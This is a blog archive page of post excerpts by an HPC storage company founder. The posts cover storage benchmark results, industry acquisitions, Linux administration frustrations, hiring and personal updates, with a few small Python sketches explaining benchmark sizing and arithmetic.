Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don’t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to “pivot” or … change focus to an idea that will work at turning into a business.
Posts
World’s first low latency cloud
PR from the day job. Remember I’ve been dying to tell people about the ultra cool project we’ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!
Posts
Why is Java used in teaching programming in high schools?
Seriously … My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and, more importantly and more concerningly, the Java language itself. I’ve got many qualms about using Java for teaching (or development, but that’s for other posts). For new students, early exposure to its rigid and verbose … one might argue … excessively verbose … syntax and structure doesn’t quite lend itself to an understanding of how algorithms and computers work.
Posts
Slight annoyance with argument processing
Tiburon as a service. I’ll talk about this at some point, and describe what I mean, but I have to say that I’ve been blown away by the response to it from many places and customers. I’ve been working on making the API restful, and finally … finally … incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.
Posts
Bitten by VirtualBox yet again, moving to kvm
I like VirtualBox. Have for a long time. But it has some … well … interesting failure modes, including some that have locked up my host machine. The problem for me is that my normal Windows desktop environment is hosted there. And I need this every now and then. Today was the final straw. I was working on a document about some of our updates in Word. I don’t like Word, but some of our partners use it, and it’s easier to use it than to fight the battle of convincing them to use LibreOffice.
Posts
More M&A
Two items.
Our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, it looks like this is on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.
Posts
Special at the party after HPC on Wall Street
The world’s first low latency drink to go with the next generation low latency cloud … the Scalable low latentini. Yes, it’s real …
Posts
Definitely having one of those days
Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I’ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.
Posts
More M&A: Microsoft buys Nokia
This one was almost obvious, it was simply a matter of “when”. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera “phone”. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.
Posts
Latest DeltaV benchmarks
24-bay system, big RAID6. Reads/writes at 4x RAM size.
[root@dv4-3 ~]# df -h /data
Filesystem Size Used Avail Use% Mounted on
/dev/md2 55T 65G 55T 1% /data
...
WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec
READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec
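Sizing a streaming test at a multiple of RAM (4x here) keeps the page cache from holding the whole data set, so the measured bandwidth reflects the disks rather than memory. A minimal sketch of that sizing step follows; it assumes a Linux host (where `os.sysconf` exposes `SC_PHYS_PAGES`) and fio’s default `kb_base=1024`, under which a `g` suffix means GiB. The function names are hypothetical.

```python
import os


def physical_ram_bytes():
    """Total physical RAM from POSIX sysconf (works on Linux; not on every platform)."""
    return os.sysconf("SC_PAGE_SIZE") * os.sysconf("SC_PHYS_PAGES")


def streaming_test_bytes(ram_bytes, factor=4):
    """Size the test well beyond RAM so the page cache cannot hold the data set."""
    return ram_bytes * factor


def fio_size_arg(nbytes):
    """Round up to whole GiB and format as a fio size string such as '64g'."""
    gib = -(-nbytes // 1024**3)  # ceiling division
    return f"{gib}g"
```

On a host with 16 GiB of RAM, `fio_size_arg(streaming_test_bytes(physical_ram_bytes()))` would yield `"64g"`, which could then be passed as, e.g., `fio --name=stream --rw=write --bs=1m --direct=1 --size=64g --filename=/data/testfile`. The job name and file path there are placeholders, not the parameters used for the run above.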
Posts
Spot on discussion of a fake crisis
Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I’ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get a STEM degree, then there’s a pretty good probability you are in the process of being deceived.
Posts
Why I've not been posting
Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we’ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won’t say where at this moment, but you can start searching around for the SI logo on a few folks sites …
Posts
Entrepreneurs are optimists
This is something I’ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.
Posts
Day job at HPC on Wall Street
Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.
Posts
NextIO shuts its doors and liquidates
As seen here and here.
There are lessons to be learned, and wisdom had from the articles. As the founder noted
Posts
bitten yet again by ancient packages in CentOS (and RHEL)
This is not a CentOS issue, in that they merely rebuild the RHEL sources without the copyrighted bits. But it’s getting to the point where the RHEL bits are so badly out of date that the platform is rapidly approaching unusability. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little-used packages such as, I dunno … apache?
Posts
how not to write driver Makefiles or configuration scripts
if [uname -r eq ...] It’s very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load and decreases the likelihood that you can actually support what’s out there … say, for example, someone does a ‘yum update’ and gets an updated kernel.
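One less brittle alternative to an exact `uname -r` match is to parse the leading numeric part of the release string and require only a minimum version, so a distribution update that bumps the build suffix does not break the build. The sketch below shows the idea in Python for clarity; in a real driver Makefile or configure script the same comparison would be written in shell or make, and probing for the actual kernel feature is better still. The function names are hypothetical.

```python
import platform
import re


def kernel_version(release=None):
    """Parse the leading numeric part of a `uname -r` string, e.g. '2.6.32-358.el6.x86_64'."""
    release = release or platform.release()
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def kernel_at_least(minimum, release=None):
    """True if the running (or given) kernel is at or above `minimum`, e.g. (2, 6, 32)."""
    return kernel_version(release) >= minimum
```

With this check, `kernel_at_least((2, 6, 32), "2.6.32-358.6.1.el6.x86_64")` stays true after an update, where an equality test against the older `2.6.32-358.el6.x86_64` string would have failed.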
Posts
A cri de cœur for Perl
As seen here. I enjoy developing code in Perl. I know, I know, it’s “the write-only language” and “looks like line noise”. It has endured some rather nasty FUD in its day, and yet it keeps on growing in use. It is just an incredibly powerful, quite expressive language, one which enables you to write very terse code if you wish. But the presentation isn’t concerned with terseness; it’s concerned with Perl’s development into a modern programming language.
Posts
The day job is 11 years old
Last year at this time, I had been incensed by a US presidential candidate, and the mindset behind him, who told me, and every other entrepreneur out there, that “we didn’t build it”. It was a foolish thing for him to say, and foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous year’s record-breaking financial results.
Posts
and the M&A accelerates
NVIDIA grabs the Portland Group. This makes sense, as NVIDIA has had CUDA, which is LLVM-based, and needed a more general-purpose compiler technology. There is nothing wrong with CUDA, but it’s very GPU-specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration, such as massive collections of ARM cores. I expect more M&A and investment activity over the next few months.
Posts
One of the joys of running a company
… is when large multi-hundred million or multi-billion dollar public companies try to ignore “small” bills from smaller than multi-hundred million dollar companies. Very much related to this. We are operationally funded. Every dollar I pay my team with comes from cash flow. So when companies try to cheat us out of money by not paying their bills, and then ignore our requests for payment … Yeah, this gets old. I prodded a reseller on this pretty hard today.
Posts
Dear NSA PRISM folks, we have a problem we need your help with
A scammer has been spoofing the day job’s number for the last year and a half. We have been trying … very hard … to get anyone at all to cooperate with us to try to find out who these losers are, so we can take them out. We have had no luck. No one wants to help. No one. Not even execs at phone companies. Go figure. One kid called last year so incensed that his mother was targeted by the scammers that he said he was going to get a gun and go meet with these jokers.
Posts
M&A roundup
I’ve not reported it, but STEC was acquired by Western Digital. STEC has been one of the day job’s partners for high performance SSD technology. Unfortunately, we’ve not had great luck with WD in the past. We even went so far as to recall/replace specific models from every machine shipped globally with those drives, due to very high failure rates, and a complete unwillingness on the part of WD to either admit defective firmware, or RMA defective drives.
Posts
ISC13 video
[vacation edition: posted from an undisclosed location somewhere off 9A in Fishkill NY, after leaving a really bad airbnb experience in Scarsdale NY] Here Russell from Scalable Informatics and Rich from InsideHPC (check em out!) talk about STAC M3 benchmarks, siCloud (aka ‘the beast'), and some of the capability class tests we ran. More later, but I am on vacation …
Posts
Very fast cloud scale tightly coupled computing and storage
I’ve been hinting at, and alluding to a benchmark we (the day job) ran on a new product for a while. I took a month to rerun these tests, verifying everything. I wanted to make sure that we got this right. Because these are big numbers. Then we sat on it for another month. Give us time to reflect, what will people’s reaction be? We slowly leaked a few pointers to people.
Posts
Contemplating replacing the whole init script for stateless booting
It’s probably fair to say that the CentOS/RHEL startup mechanism is, well, broken beyond repair for anything but trivial cases. Out of the box, NFS root doesn’t work, and it’s very … extraordinarily … hard … to make it work. iSCSI and other connection mechanisms don’t work. This has been the case since 6.0. 6.4 continues the long tradition of working for trivial cases, and not working for anything remotely more interesting.
Posts
Two screwups in two days
So the day job released some PR. I paid attention to the content, but not to the title. Unfortunately, I should have. We set records for the 2.8 version of kdb+. The title suggests otherwise. Call this a mea culpa, as I had approved the content before I saw the new results with the 3.1 version. So the PR went out, and I think I’ve got egg on my face :( .
Posts
Crazy travel schedule ahead
Off to Chicago tonight to present at the STAC Summit tomorrow. Then meeting customers on Wednesday, phone calls, and a partner event. Thursday, back to Detroit, then I fly out to NYC to meet customers on Friday. Back Saturday morning for our national karate tournament for our style (and I am very behind in my practice). Then Sunday back to NY to present Monday at the STAC Summit in NYC. Back to Detroit on Tuesday, then Friday, in theory, I have 10 days off for vacation.
Posts
You can get a hint of the big test result by watching the rotating banner on the day job home page
Though the 11 was changed to a 12. That is being reverted. Day job home page is here. As it scrolls by, think “Massive, unapologetic, firepower”. Writ large. This would pair well with any top500 or !top500 computing system. More to come … more … to come !!!
Posts
STAC M3 Audited report is now published
See here. Take home message: Delivered the fastest response time in the NBBO benchmark compared to all publicly disclosed results to date for all systems (STAC-M3.β1.1T.NBBO.LAT2). Delivered the fastest WRITE results compared to all publicly disclosed results for all systems (STAC-M3.v1.1T.WRITE.LAT2). Among systems using kdb+ 2.8: This system set new records for 5 of the 17 benchmarks (STAC-M3.β1.1T.NBBO.LAT2, STAC-M3.v1.1T.WRITE.LAT2, STAC-M3.β1.10T.STATS-AGG.LAT2, STAC-M3.β1.10T.STATS-UI.LAT2, STAC-M3.β1.1T.STATS-UI.LAT2). Delivered over 2x the performance of the previous best published results for the MKTSNAP benchmark, among systems using spinning disk or flash storage.
Posts
The big test to which I've alluded
… finalizing the text on this, link up soon (its up but hidden from view). The response from people who’ve seen it has been awesome. More very soon. Today, I hope.
Posts
STAC M3 benchmarks to be published tomorrow
I’ve got a few things to add to the report today, and then we will have the STAC group publish the report. Performance is … er … very … very … good. A few tests which won’t favor our design as compared to massively wide striped disks were better on other kit. But I am blown away at how our little 2 socket server did in comparison to other, better known kit.
Posts
Finally fixed the day job DNS
This took far longer than it should have. This was in part due to my initial decision (since changed) to use dbndns at two sites (one internal, one in the cloud). The TL;DR version: dbndns and its parent project, djbdns, are a royal pain to get up, operational, and stable. I tried the packaged versions, the source, etc. Several different distributions (CentOS 6.x, Ubuntu 12.04, …). 4 weeks into this mess, I asked myself the critical question.
Posts
Article on a likely causation vector for global warming
I am not a huge fan of the science and accompanying rhetoric around “global warming.” And it’s not because of the Koch brothers (or any other weapons-grade conspiracy theory idiocy on the part of certain activist elements of our society). It’s because the “science”, or more precisely, the theory that currently holds sway in large swaths of academia and public policy circles, appears to generate testable hypotheses that are not matched by empirical observations.
Posts
Wish I was going to ISC13
I was … but then it was determined that I needed to give 2 of the STAC Summit talks in Chicago and NY on the day job’s systems. Then this week, Tianhe-2 info came out, and … well … WOW! Great job guys! (ob-day job: “could we interest you in some monstrously fast storage to go with that space-time fabric warping super?") I was speaking recently with a VC we had talked to in early 2002 about accelerators.
Posts
Should be able to talk about the benchies early next week
Got confirmation from marketing folks that I won’t cause irreparable damage if I just put the link up. Next week. Early.
Posts
New posts up at the day job blog, and yes, we now have a day job blog!
See here: ( http://scalableinformatics.com/blog/ ) The way I looked at it, I needed a place to talk more product/solutions/work without having my own personal opinions on myriads of things weave throughout. That is, scalability.org is something of mine personally, that I write for, based upon whatever itch I wish to scratch. The blog at the day job lets us (collectively) talk about cool things without having that “me/mine” thing intermix. I’ll be updating here of course as well.
Posts
What an intense 3 weeks
I can’t talk publicly about everything yet, just its been so demanding of my time. I’ve run and debugged benchmarks, flown in to meet customers and others, generated many quotes, given many presentations. In this, I’ve got two hard deadlines for getting stuff written that I have to do before I can write anything here. So let me crank on those in the next 24 hours, and I’ll update.
Posts
What would you do if you had "infinite" bandwidth and IOPs coupled directly to your computing?
Imagine you have some … I dunno … gargantuan amount of bandwidth available, to and from your disks. And you have just positively insane IOP rates, at these very high bandwidths. And then you tightly couple a few hundred processor cores, and a few terabytes of memory. What would you consider “gargantuan” bandwidth? What would you consider “insane” IOP rates? And most importantly, if you had the type of IO fire power you considered gargantuan and insane, what would you do with this?
Posts
Having fun writing a presentation about molecular dynamics and big data
Who’da ever thunk that MD simulations would start to become large enough to present IO and analysis problems? Way way back when the digital supercomputing dinosaurs roamed the earth, looking for problems to crunch on, I simulated gallium arsenide on some of these machines. I’d be lucky to get 100 time steps done, in a week, for 64 atoms. For 64 atoms in double precision, with position, velocity, and atom type, let’s be generous and call this 64 bytes per atom in binary, or 80 bytes (one terminal line) per atom in text.
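The back-of-envelope arithmetic in the paragraph above can be made explicit. The per-atom sizes and the old run’s figures (64 atoms, roughly 100 steps) come from the text, assuming one saved frame per time step; the “modern run” numbers (a million atoms, 10,000 saved frames) are purely hypothetical, included only to show how quickly the same formula reaches sizes where IO and analysis become real problems.

```python
# Back-of-envelope trajectory sizes, using the per-atom figures from the text.
BYTES_PER_ATOM_BINARY = 64  # 3 doubles position + 3 doubles velocity (48 B) + type, rounded up
BYTES_PER_ATOM_TEXT = 80    # one 80-column terminal line per atom


def trajectory_bytes(atoms, bytes_per_atom, frames):
    """Bytes needed to store `frames` snapshots of `atoms` atoms."""
    return atoms * bytes_per_atom * frames


# The old run: 64 atoms, about 100 time steps in a week, one frame per step.
old_binary = trajectory_bytes(64, BYTES_PER_ATOM_BINARY, 100)  # 409,600 bytes
old_text = trajectory_bytes(64, BYTES_PER_ATOM_TEXT, 100)      # 512,000 bytes

# Hypothetical modern run (illustrative numbers, not from the post):
# one million atoms, 10,000 saved frames.
modern_binary = trajectory_bytes(1_000_000, BYTES_PER_ATOM_BINARY, 10_000)  # 640 GB
```

A week of the old simulation fits in well under a megabyte, while the hypothetical modern run needs about 640 GB (decimal) in binary alone, before any analysis output.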
Posts
Why I am taking a while to post the results
In short, I am trying to verify what we measured. It’s repeatable; I’ve been measuring it for a week now, and having trouble with it, but I want to make absolutely sure I get this correct. Because these are big numbers. Very. Very. Big. It would be annoying if I made a mistake. So I am double/triple/quadruple checking.
Posts
Social Media Overload
Definition: When the amount of social media that everyone expects you to consume with a myriad of different, incompatible, and often annoying apps, absorbs so much of your time that your productivity drops … you decide that in the interests of your own personal sanity, you will spend more time with your family, your dog, and your friends, than dealing with {facebook,twitter,linkedin,RANDOM_SOCIAL_MEDIA_NAME} streams which steal time from the important things in life.
Posts
It must be some obscure law of nature
… whereby when I have the least time to spend on a particular task, requests arrive in an order that maximizes the time I spend on that task, via the least efficient mechanisms possible. Put another way, when I am busy, more people seek more of my time to handle things that I shouldn’t need to be involved in. Or another way … simple things should be trivial, complex things possible, and yet the universe appears to arrange itself so that simple things become complex, and complex things become impossible.
Posts
Back with some benchmarks for siCloud
For the day job. They are … well … pretty nice. What is siCloud you might ask? Well, think a very … very fast storage and computing cloud, leveraging many technologies we’ve developed. You will be hearing more about this soon. And I’ll show some numbers and pictures in another post. But before I get them up, anyone want to hazard a guess on the aggregate bandwidth and IOP rate for this system?
Posts
Again, terribly busy
Have an order which is absorbing all of my cycles, and this is coupled with a nice springtime cold, and an elbow injury. Now if my dog bites me, my month will be complete. Will start posting soon, once I get the burn-in running. To give you a sense of the size of this order, we are installing additional power and AC capacity in our lab (it’s happening now). We just asked our landlord if they have a larger space in this complex (it’s built into our lease, as we weren’t sure of our growth rates), and they really don’t have anything we can use, so we might just suffer here for another year, and build up capacity in NJ.
Posts
Off to HPC on Wall Street
Looking forward to this. Our booth is smaller, but in a higher traffic area. We have 2 systems with us, a siFlash and a 60 bay JackRabbit. And we are putting together a small get-together after the show. This should be fun. I am looking forward to it. I’ll try to tweet from the show floor.
Posts
You think I would learn already
It’s called “fractured bone spur tip of olecranon”. It means I’ve got a broken bone in my elbow area. My arm is in a sling and immobilized. Got it while sparring at a karate tournament. Landed hard on my elbow due to a slippery floor. Of course it’s my right arm, the one I write with. I am typing this with one hand, using the hunt and peck method. Seriously need voice IO for machines.
Posts
Products versus projects
Long ago I pondered
Projects, inherently, are un-finished entities. There are missing things. There are “un-implemented features” which would be necessary for a product. Like say, an on-off switch, among other things. Products are inherently compromises between design, realities of implementation costs/schedules/complexities, etc. Software developers often get into the endless cycle of tweaking features and improving systems so that they miss target dates. We see this with larger scale projects as well, unless someone adopts the iron-fist rule on adding/tweaking versus shipping/learning/improving $version++.
Posts
Windows 8 is terrible
No, that’s unfair to things that are truly terrible. It sets a low mark … a really … really … low mark. Trying to help a relative with adding a printer. A printer that happily works under Windows 7. No issues, just works. Works under Linux on my laptop here. Nothing special, just works. But Windows 8? Oh … no … it … doesn’t. Drivers (the built in ones we are told to use) don’t work.
Posts
This simply needs to be said ... Networkmanager must be neutered
It should never, ever be enabled by a default install on a server. Ever. Under any circumstances. For any reason. I’d even argue it should never be installed by default for any reason on a server. Just fixed another NetworkManager-caused problem (TM). Modifying /etc/resolv.conf on a server after I changed the NICs as indicated. I mean … seriously folks?
Posts
Failing 10GbE NICs
I won’t mention the vendor by name here. Needless to say, I am unhappy with the failure rate on their NICs. We had a number of units we bought for internal use as well as for customer use. The NICs would throw various driver exceptions, and kernel panic the machines. It was doing this to our central server this past week, while I had been lighting up KVM guests on an app server, specifically kernel panicking under even moderate load.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
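Replicating a per-node section really is trivial. The sketch below assumes a hypothetical layout: only the section name `n01-ipmi` comes from the post, while the keys (`host`, `user`, `password`, `log`), the log path and the `replicate` helper are invented for illustration. Check the example config in the repository for the real schema.

```python
import json

# Hypothetical config layout. Only the "n01-ipmi" section name comes from the
# post; every key and value inside it is an illustrative assumption.
TEMPLATE = {
    "n01-ipmi": {
        "host": "n01-ipmi",              # hypothetical: BMC hostname or IP
        "user": "console",               # hypothetical: low-privilege console user
        "password": "changeme",          # hypothetical placeholder, not a real credential
        "log": "/var/log/icl/n01.log",   # hypothetical log path
    }
}

def replicate(config: dict, template_key: str, count: int) -> dict:
    """Clone the template node section for nodes n01..nNN (hypothetical helper)."""
    base = config[template_key]
    out = {}
    for i in range(1, count + 1):
        name = f"n{i:02d}"
        section = dict(base)                        # shallow copy of the template
        section["host"] = f"{name}-ipmi"            # per-node BMC name
        section["log"] = f"/var/log/icl/{name}.log" # per-node log file
        out[f"{name}-ipmi"] = section
    return out

if __name__ == "__main__":
    print(json.dumps(replicate(TEMPLATE, "n01-ipmi", 4), indent=2))
```

Keeping the shared settings in one template and only overriding per-node fields is what makes adding nodes cheap; the trusted-web-server approach mentioned above would replace the in-file password entirely.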
Posts
Time wasting phone call detector regex
So there you are, sitting at your desk trying to do your work. A call comes in, you pick it up.
Me: $day_job, Landman speaking
Them: I would like to speak to (garbled) about (garbled)
meta-Me: [start 15 second BS detector clock filter]
Me: I’m sorry, I can’t hear you … who are you and what is this call about?
Them: (barely audible) I am XYZ PDQ representing ABC DEF, and how is your day going?
Posts
There are no silver bullets
… and anyone promising you one is selling you something. This is true everywhere, though especially so in massively overhyped markets. There are no secret incantations that will tease actionable insights out of a gargantuan bolus of data. Yet, from all the “company X now has a hyper optimized, purple colored Hadoop distro, with a pony” announcements, one might think that it was a panacea … a panopticon with infinite ability to extract the most profound and profitable nuggets from mountains of steaming piles of bits.
Posts
A replacement laptop for my daughter
Her old Dell Inspiron died, again. First it was a motherboard. Then a hard disk. And a cracked bezel. Now it looks like it’s a motherboard again. The power supply bits are, IMO, completely unforgivable. Until Dell lets us use a replacement supply that is not manufactured by Dell, we won’t be buying Dell laptops. I suspect this will be a while. But this laptop, and my wife’s version, have lots of problems.
Posts
Reaching saturation: Our ongoing glut of Ph.D. educated talent
Achieving a Ph.D. is one of the highest academic goals one can set. You work insanely hard, you sacrifice income, starting a family, and many other things, in the pursuit of this (in most cases). And when you finish, you are, theoretically, in an upper strata of accomplishment. Many (including myself) entered into this path, decades ago, based upon (now known to be either overtly falsified, or completely incompetently analyzed) data which suggested a dearth of scientists needed to staff the ever growing college and university departments, and the massively growing industrial scientific community, as a solid rationale for pursuing such a difficult course.
Posts
Why posting has been slow
Time. Basically I have none. I steal some here and there to get things out, but I have been completely swamped. Or I post when I am up late at night/early morning, and can’t get to sleep (occasional hazard of running a growing business). On a happy note, the company is growing. We have brought 4 people on board over the last six months, with an additional 2-4 planned near term.
Posts
As the clouds change ...
This is going to take a few paragraphs to set up, so please bear with me. One of the harder aspects to building a business atop someone else’s platform is a fundamental dependency upon them that you create. Your business depends, to a very large extent upon their good will, and their desire to grow an ecosystem. Every now and then you get more predatory platform providers. These groups like to take control of larger segments of ecosystem, and provide a product or service that gets harder for others to compete with, because, in part, they are naturally disadvantaged in doing so.
Posts
ATI experiment update: day 19
So here I am, with an ATI W5000 card driving my dual display Linux desktop. I had pulled the NVidia GeForce card, as the driver or the card kept tossing Xid: NVRM errors, that I could not make go away. Googling this error took me back to years of people dealing with similar issues, and never getting a fix. Just reporting the same problem. That was very annoying. The day job has customers with these cards … exactly what are we supposed to be telling them?
Posts
[Updated] #walkingspam that you cannot easily filter electronically
[update] Ok, this was amusing. An SEO group commented with a link back to their SEO site. Our spam filter caught it. (/shakes head) We had the most … well … interesting event happen at the office a few days ago. You know how, in your spam filtered email you get hundreds or thousands of items with wording something like this: If you were my Client you would be # 1 on Google or I can make you # 1 on Google in 3 Weeks.
Posts
A lightly ARMed JackRabbit 60 bay unit
This is 8x nodes (2x EnergyCards) of Calxeda goodness. We expect to be able to show off (and demo!) a live, more heavily ARMed unit shortly.
[ ](/images/ARMed_JackRabbit.jpg)
Posts
Putting a 60 bay JackRabbit through some basic tests
Basic (conservative) configuration of the day job’s high performance tightly coupled storage system, no SSDs (apart from the OS drives). RAID6 LUNs, no RAID0’s. This is spinning rust folks. Nothing but spinning rust. In a realistic configuration. And no, we haven’t yet begun to tune this. Streaming writes, 1 thread per LUN:
Run status group 0 (all jobs):
  WRITE: io=1279.5GB, aggrb=5944.6MB/s, minb=5944.6MB/s, maxb=5944.6MB/s, mint=220405msec, maxt=220405msec
5.9 GB/s sustained writes for this case.
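fio’s aggregate bandwidth (`aggrb`) is simply the total IO divided by the run time, so the numbers can be sanity-checked by hand. The sketch below assumes fio’s base-1024 units of that era (1 GB = 1024 MB); the figures are self-consistent under that assumption. The helper name `aggregate_mb_per_s` is hypothetical.

```python
# Recompute fio's aggregate bandwidth from its io= and runtime fields.
# Assumes base-1024 units (1 GB = 1024 MB), as fio of this era reported.

def aggregate_mb_per_s(io_mb: float, runtime_ms: float) -> float:
    """Total MB moved divided by wall-clock seconds."""
    return io_mb / (runtime_ms / 1000.0)

if __name__ == "__main__":
    # JackRabbit streaming writes: io=1279.5GB, mint=maxt=220405msec
    print(f"{aggregate_mb_per_s(1279.5 * 1024, 220405):.1f} MB/s")
    # The same check applies to the DeltaV4 runs reported further down:
    print(f"{aggregate_mb_per_s(65505, 44633):.1f} MB/s write")
    print(f"{aggregate_mb_per_s(65412, 36050):.1f} MB/s read")
```

The recomputed values land within about 0.1 MB/s of fio’s printed `aggrb`; the small gap comes from `io=` itself being rounded in the report.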
Posts
karma?
On this blog, I’ve pointed out the failings of many others. I’ve hinted at having to take ownership for others’ failures as the customer sees us, and not the people behind us (often messing with us). Our job is, among many other things, to hide that silliness away from them so they can focus upon their issues. This is not to say we/I don’t mess up. Most of the time it’s minor.
Posts
Getting out of Dodge
Thursday morning, the weather prediction was for 1-3 inches of snow in Secaucus, NJ. I’d been in a data center working the past week on bringing a system to final state. It’s done modulo some cosmetic and minor functional issues that should not impede usage. So we accomplished this mission, though I am something of a perfectionist, so we’ll be going back out in a week or so to work on the cosmetic bits.
Posts
Enable changes or enforce design
We have this dilemma. Customers who see our siCluster systems often like everything they see, but want “minor” changes. And we evaluate the changes they want for impact, describe it, and suggest a go/no-go based upon many aspects. Including supportability, stability, etc. We like providing this flexibility. Which gives rise to the dilemma. For us to provide supportable systems that work in a predictable manner, we have to cordon off changes.
Posts
Baseline test for technical staff
As usual, xkcd knocks it out of the park.
[ ](http://xkcd.com/1168/)
I talked about qualifications for our SE position. The ability to talk customers through complex vi-based configuration sessions for system files, while driving 70 mph on the freeway, is a hard requirement. Not quite a munition defusing effort, but close enough. Unfortunately in something like the game of telephone, what I originally wrote was … transmogrified … into something very different.
Posts
A week into the ATI experiment
So I was sick of the crashes in the NVidia driver. Nouveau wasn’t that good. Maybe someday it will be, but it’s really not that useful to me. So I opted for an ATI W5000 card. Initial install was rocky. The card used VESA drivers, and that was fine for initial boot. Accelerated drivers … didn’t. They were slower than the VESA drivers. Window movements were jerky. It felt … wrong … somehow.
Posts
You asked for it ... Riemann Zeta Function in javascript or node.js
Ok, this was fun. It’s been a while since I dusted off good old rzf … ok, it’s been 12-ish days … but I really have been wanting to try recoding it in javascript. As you might (or might not) remember, I asked questions (a very long time ago) about quality of generated code from a few different C compilers (and eventually the same code in Fortran). I rewrote inner loops to hand optimize the compilation, and then recoded as SSE2.
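For readers who haven’t met rzf, here is a minimal sketch of the kind of computation involved. It assumes the benchmark is a direct partial sum of ζ(s) = Σ 1/kˢ for real s > 1, which may not match the original C, Fortran, SSE2 or JavaScript code. It is written in Python only to keep these examples in one language, and the name `zeta_partial` is hypothetical.

```python
import math

def zeta_partial(s: float, n_terms: int) -> float:
    """Approximate the Riemann zeta function for real s > 1 by summing
    1/k**s for k = 1..n_terms (hypothetical helper, not the original rzf).

    The loop runs from the smallest term to the largest, which reduces
    floating-point rounding error compared with summing 1, 1/2**s, ... first."""
    if s <= 1:
        raise ValueError("the series only converges for s > 1")
    total = 0.0
    for k in range(n_terms, 0, -1):
        total += 1.0 / k ** s
    return total

if __name__ == "__main__":
    approx = zeta_partial(2.0, 1_000_000)
    exact = math.pi ** 2 / 6          # closed form for zeta(2)
    print(approx, exact, exact - approx)
```

For s = 2 the truncation error after N terms is roughly 1/N, so a million terms agree with π²/6 to about six digits. The tight inner loop of divisions and powers is exactly what makes this a handy probe of compiler and runtime code quality.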
Posts
resonances
This past December, 1 year to the day, and in fact, the very hour my wife was waking up from her surgery, we were at a Trans Siberian Orchestra concert. I like TSO quite a bit, and this had serious significance for us. Like the XKCD biopsiversary, this was our own little F-U to cancer. Not directly related to this, they played a rearranged version of a song on their newer CD.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in the NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.”
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio
...
Run status group 0 (all jobs):
   READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec
This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
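The extrapolation is straightforward arithmetic on the fio output. A minimal sketch, assuming fio’s base-1024 units (1 TB = 1024² MB, 1 PB = 1024³ MB); the helper name `seconds_to_read` is hypothetical.

```python
# Extrapolate read times from the measured siFlash run.
# Assumes base-1024 units: 1 TB = 1024**2 MB, 1 PB = 1024**3 MB.

RATE_MB_S = 786432 / 32.808   # io / runtime, matches aggrb=23971MB/s within rounding

def seconds_to_read(total_mb: float, rate_mb_s: float = RATE_MB_S) -> float:
    """Seconds needed to stream total_mb at a sustained rate."""
    return total_mb / rate_mb_s

if __name__ == "__main__":
    tb = seconds_to_read(1024 ** 2)
    pb = seconds_to_read(1024 ** 3)
    print(f"rate: {RATE_MB_S:.0f} MB/s")
    print(f"1 TB: {tb:.0f} s")
    print(f"1 PB: {pb:.0f} s = {pb / 3600:.1f} h")
```

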